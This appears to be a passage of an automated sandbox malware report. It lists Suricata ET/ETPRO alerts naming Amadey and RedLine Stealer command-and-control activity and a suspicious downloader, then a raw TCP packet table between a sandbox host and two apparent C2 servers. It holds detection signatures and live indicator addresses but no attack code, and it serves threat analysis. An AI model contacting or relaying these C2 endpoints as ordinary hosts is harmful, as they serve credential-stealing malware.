2024-12-13T01:37:37.541008+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.5	49780	185.81.68.148	80	TCP
2024-12-13T01:37:37.541008+0100	2856150	ETPRO MALWARE Amadey CnC Activity M6	1	192.168.2.5	49780	185.81.68.148	80	TCP
2024-12-13T01:37:37.687904+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.5	49781	185.81.68.148	80	TCP
2024-12-13T01:37:37.687904+0100	2856150	ETPRO MALWARE Amadey CnC Activity M6	1	192.168.2.5	49781	185.81.68.148	80	TCP
2024-12-13T01:37:38.264018+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:39.039789+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:39.159660+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:39.825443+0100	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	192.168.2.5	49792	185.81.68.148	80	TCP
2024-12-13T01:37:39.825443+0100	2856149	ETPRO MALWARE Amadey CnC Activity M5	1	192.168.2.5	49792	185.81.68.148	80	TCP
2024-12-13T01:37:40.305964+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49791	185.81.68.148	80	TCP
2024-12-13T01:37:40.683961+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.5	49793	185.81.68.148	80	TCP
2024-12-13T01:37:40.750025+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:41.037322+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.5	49794	185.81.68.148	80	TCP
2024-12-13T01:37:41.311807+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:41.758939+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:42.214100+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:42.925495+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:43.439327+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:43.879129+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:44.353023+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:44.754750+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:45.254752+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:45.633409+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:46.070832+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:46.558826+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:46.805970+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49813	185.81.68.148	80	TCP
2024-12-13T01:37:47.205200+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49816	185.81.68.147	80	TCP
2024-12-13T01:37:52.947721+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49832	185.81.68.148	80	TCP
2024-12-13T01:37:59.165288+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49857	185.81.68.148	80	TCP
2024-12-13T01:38:01.525345+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49867	185.81.68.147	80	TCP
2024-12-13T01:38:01.525345+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49867	185.81.68.147	80	TCP
2024-12-13T01:38:05.047064+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:05.047064+0100	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:05.257576+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49877	185.81.68.148	80	TCP
2024-12-13T01:38:05.490439+0100	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	185.81.68.147	1912	192.168.2.5	49876	TCP
2024-12-13T01:38:10.649831+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:11.496837+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:11.616615+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.81.68.147	1912	192.168.2.5	49876	TCP
2024-12-13T01:38:11.876385+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49900	185.81.68.148	80	TCP
2024-12-13T01:38:12.106689+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:13.724329+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:14.163329+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:14.601349+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:15.038142+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:15.587566+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:16.246286+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:16.944208+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:17.552415+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:17.981386+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49922	185.81.68.148	80	TCP
2024-12-13T01:38:19.335808+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:19.775980+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:20.215536+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:20.655213+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:22.416404+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:22.858077+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:23.399506+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:23.835507+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:24.207994+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49943	185.81.68.148	80	TCP
2024-12-13T01:38:24.273386+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:24.713912+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:25.235281+0100	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:30.823168+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49962	185.81.68.148	80	TCP
2024-12-13T01:38:36.964250+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	49983	185.81.68.148	80	TCP
2024-12-13T01:38:43.321073+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	50002	185.81.68.148	80	TCP
2024-12-13T01:38:49.554536+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	50023	185.81.68.148	80	TCP
2024-12-13T01:38:55.885915+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	50041	185.81.68.148	80	TCP
2024-12-13T01:39:02.226578+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	50058	185.81.68.148	80	TCP
2024-12-13T01:39:08.461476+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.5	50082	185.81.68.148	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 01:37:00.175154924 CET	49704	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:00.295120001 CET	80	49704	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:00.295213938 CET	49704	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:00.295267105 CET	49704	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:00.415186882 CET	80	49704	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:01.625020981 CET	80	49704	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:01.625102043 CET	80	49704	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:01.625206947 CET	49704	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:01.626326084 CET	49704	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:01.626580954 CET	49705	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:01.746844053 CET	80	49704	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:01.747033119 CET	80	49705	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:01.747167110 CET	49705	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:01.747220993 CET	49705	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:01.868410110 CET	80	49705	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:01.868757963 CET	49705	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:01.988522053 CET	80	49705	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:03.409686089 CET	80	49705	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:03.409729004 CET	80	49705	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:03.409967899 CET	49705	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:03.411490917 CET	49705	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:03.412115097 CET	49706	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:03.531579971 CET	80	49705	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:03.531975031 CET	80	49706	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:03.532354116 CET	49706	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:03.532355070 CET	49706	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:03.652261972 CET	80	49706	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:03.652638912 CET	49706	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:03.772423983 CET	80	49706	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:04.993227959 CET	80	49706	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:04.993295908 CET	80	49706	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:04.993416071 CET	49706	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:05.004626036 CET	49706	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:05.005007029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:05.126826048 CET	80	49706	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:05.126960039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:05.127044916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:05.127501965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:05.247236967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.461503029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.461520910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.461577892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.461905956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.461925030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.461945057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.461975098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.462086916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.462104082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.462121010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.462136984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.462148905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.462173939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.462343931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.462634087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.581523895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.581547022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.581744909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.585659027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.629667044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.654046059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.654153109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.654453993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.658133030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.658257008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.658366919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.666618109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.666757107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.666903019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.675092936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.675157070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.675359964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.683619976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.683773994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.688808918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.692106009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.692228079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.696808100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.700584888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.700839043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.704827070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.709072113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.709168911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.709357977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.717602968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.717731953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.717930079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.725944042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.725971937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.726139069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.749447107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.749545097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.749712944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.845690012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.845793962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.845921040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.848217964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.848373890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.848473072 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.853187084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.853290081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.853403091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.858191013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.858352900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.858479023 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.863117933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.863202095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.863312960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.867866993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.868037939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.868176937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.872667074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.872797966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.872910976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.877554893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.877635002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.877753973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.882364035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.882447958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.882565022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.887137890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.887288094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.887424946 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.891946077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.892071009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.892366886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.896744013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.896852970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.897017002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.901567936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.901712894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.901837111 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.906347990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.906460047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.906580925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.911196947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.911359072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.911464930 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:06.916007996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:06.957832098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.037724972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.037852049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.037976980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.039520979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.039657116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.039766073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.043351889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.043409109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.043524027 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.047089100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.047144890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.047261953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.050817966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.050925970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.051028013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.054606915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.054730892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.054847956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.058382034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.058507919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.058610916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.062146902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.062267065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.062372923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.065922976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.066032887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.066149950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.069701910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.069818974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.069936037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.073460102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.073637962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.073740005 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.077238083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.077368021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.077467918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.081052065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.081223011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.081343889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.084805965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.084847927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.084963083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.088573933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.088690996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.088807106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.092363119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.092418909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.092535973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.096137047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.096246958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.096307993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.100275040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.100406885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.100523949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.103696108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.103794098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.103888988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.107415915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.107573986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.107686043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.111249924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.111320972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.111432076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.114995956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.115102053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.115206003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.118787050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.118947029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.119054079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.122564077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.122682095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.122791052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.126322031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.126440048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.126554966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.130079985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.130224943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.130331993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.133860111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.134005070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.134109020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.137604952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.137706995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.137814999 CET	49707	80	192.168.2.5	185.81.68.147
